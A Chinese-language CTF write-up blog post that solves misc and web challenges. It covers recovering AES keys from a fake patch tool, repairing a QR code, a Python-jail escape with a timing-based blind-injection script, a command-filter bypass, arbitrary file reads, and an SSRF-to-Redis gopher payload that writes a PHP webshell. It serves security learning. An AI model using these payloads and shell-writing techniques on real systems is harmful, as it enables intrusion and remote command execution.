本文最后更新于 110 天前,其中的信息可能已经有所发展或是发生改变。
Misc
真假补丁
- 从流量中导出一个自解压程序,解压后得到
补丁检测.exe与补丁修复.exe,先传个云沙箱,没什么毒,虚拟机跑一下
- 本想大致逆一下看看逻辑,发现是
nuitka,反编译一大堆,不看了,先把程序跑起来,装个python3.8
- 行,得是admin用户,不然路径不对,切换用户后然后再次运行
补丁检测.exe就检测一下,和题没什么关系
补丁修复.exe发现缺少requests和pycryptodome,合理猜测加密了什么,访问了什么
- 再次运行,好,不缺库了,缺文件
- 算是正常运行了,只是请求不成功,再看流量包,发现
POST /data.php,同时携带了一串值
d7DxBWeC1sSz5LY3colz2jpYCYgRdwfNFKcy1LIs/5RCocrzCD7bN9Do95e8AJvT+xp5YgHNrilph3JfBZenoUzY5saQYer85vqow1reJBsR4Kv2dDNdlXrUFe8blY7t- 结合配环境时装的两个包,结合题目名,合理构想这个程序的流程,读取
admin桌面的密码,然后使用pycryptodome进行加密,最后requests发起请求;逻辑很清楚了,逆向不现实(对我来说,说不定逆向跌随便杀),那就misc一点儿,直接把加密过程截下来,盲猜是AES-CBC,修改安装的包源码
- 跑一下试试,很成功啊,发现在AES加密前进行了
base64,同时得到了key与iv,mode=2,即为CBC模式,浅拿一个一血
key: 324dd63a6365ca7729c8f85b6e479834
iv: ffe01db6b79092b8
两极反转
两极反转,黑白不分
奇变偶不变,横变竖不变
(PS:或许你要非常熟悉二维码的结构!- 字面意思,反转黑白,奇数行反偶数行不反,涉及定位符的行不翻
from PIL import Image
import pyzbar.pyzbar as pyzbar
image = "8E2A248B-0EE8-42b2-B19B-C6A9CE0D47F8.png"
img = Image.open(image)
img = img.convert("RGB")
img = img.resize((29,29),Image.NEAREST)
for j in range(8,20,2):
for i in range(29):
tmp = img.getpixel((i,j))
if(tmp == (0,0,0)):
img.putpixel((i,j),(255,255,255))
else:
img.putpixel((i,j),(0,0,0))
img = img.resize((726,726),Image.NEAREST)
img.show()
barcodes = pyzbar.decode(img)
print(barcodes)
for barcode in barcodes:
barcodeDATA = barcode.data.decode("utf-8")
print(barcodeDATA)What_CAN_I_SAY
- 空白爷的题,但是出大问题,builtins没删掉,各种非
safebuiltins_dict={x:y for x,y in dict(vars(__builtins__)).items() if x[0] not in "_-abcdefghijklmnopqrstuvwxyz"}
del __builtins__
try:exec(code,safebuiltins_dict,{})
except:pass- 没什么回显,但我就想RCE,打个盲注拿结果
from pwn import *
from time import time
p = '{}abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
a = b"__import__('os').popen('cat /home/ctf/flag*').read()"
a = f'eval(bytes({str(list(a)).replace(" ","")}))'
template = f"""
a = {a}
if a[&&] == chr($$):
eval(bytes([101,118,97,108,40,34,95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,115,121,115,116,101,109,40,39,115,108,101,101,112,32,50,39,41,34,41]))
what.can.i.say
<EOF>
"""
context.log_level = 'error'
for index in range(1000):
for i in p:
s = template.replace("&&", str(index))
s = s.replace("$$", str(ord(i)))
r = remote("pwn-32a2755c56.challenge.xctf.org.cn", 9999, ssl=True)
recv = r.recvuntil(b">>>").decode()
r.sendline(s.encode())
a = time()
r.recvuntil(b"?")
b = time()
r.close()
if b - a > 1:
print(i,end="")
break- 假设
builtins被预期删掉了,从作者那偷个wp来,这个payload非常极限,就差两三个字符
先这样,在那样,然后就好了
try:what=1;what.can.i.say
except:
try:().classImroIsubclassesIinitIglobalsIbuiltinsIsysItropmiIrunsboxIopenIevalI5f2e7b7d2f27
except Exception as a:a=a.name;I=a[5];c,m,s,i,g,t,y,p,r,f,v,h=a.split(I);u,d,z,x,l,q=a.encode().fromhex(h).decode();n=u*2;p=p[::-1]
try:(z+I+d+n+c+n+d+n+m+n+d+y+x).format(I=[])
except Exception as e:o=e.obj[1]
try:(z+I+d+n+s+n+d+y+x).format(I=o)
except Exception as e:o=e.obj()[140]
try:(z+I+d+n+i+n+d+n+g+n+d+y+x).format(I=o)
except Exception as e:b=e.obj[n+t+n];y=b[n+p+n](y);r=b[v](q+b[f](r+l+u+r[:3]+u).read().split(q)[1]+q);y.stdout.write(r);y.stderr.write(r)- 主体思想是通过
Exception.name获取字符串,通过str.format调用属性获取sys.stdout来达成输出flag的条件 - 又学到了新姿势(隔了这么久应该可以发了吧( ̄︶ ̄)↗
Web
Easyweb
- index.php
<?php
if (isset($_GET['id']) && floatval($_GET['id']) !== '1' && $_GET['id'] == 1)
{
echo 'welcome,admin';
$_SESSION['admin'] = True;
}
else
{
die('flag?');
}
?>
<?php
if ($_SESSION['admin'])
{
if(isset($_POST['code']))
{
if(preg_match("/(ls|c|a|t| |f|i|n|d')/", $_POST['code'])==1)
echo 'no!';
elseif(preg_match("/[@#%^&*()|\/?><']/",$_POST['code'])==1)
echo 'no!';
else
system($_POST['code']);
}
}
?>/?id=1.0绕过第一段,l\s绕过匹配
- 访问
/718g
where
- 提供了个任意文件读的接口
/look?file=/app/app.py
from flask import Flask,Response, request
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return "flag被我藏起来了,/look一下file看看呢"
@app.route('/look', methods=['GET', 'POST'])
def readfile():
if request.values.get('file'):
file = request.values.get('file')
f= open(file,encoding='utf-8')
content=f.read()
f.close()
if 'flag' in content:
return "打卡下班"+content
else:
return "抓紧找,着急下班"+content
return "找找看,我着急下班"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
- 翻翻常见的目录,在
/root/.bash_history得到flag
tantanta
file://任意文件读,aaaabbb.php
<?php
error_reporting(0);
// error_reporting(E_ALL & ~E_WARNING);
// highlight_file(__FILE__);
$url=$_POST['data'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>- 读取
/proc/net/tcp查看端口状态,6379 redis
- gopher打redis写马
POST /aaabbb.php HTTP/1.1
Host: host
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ip:port/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 433
data=gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
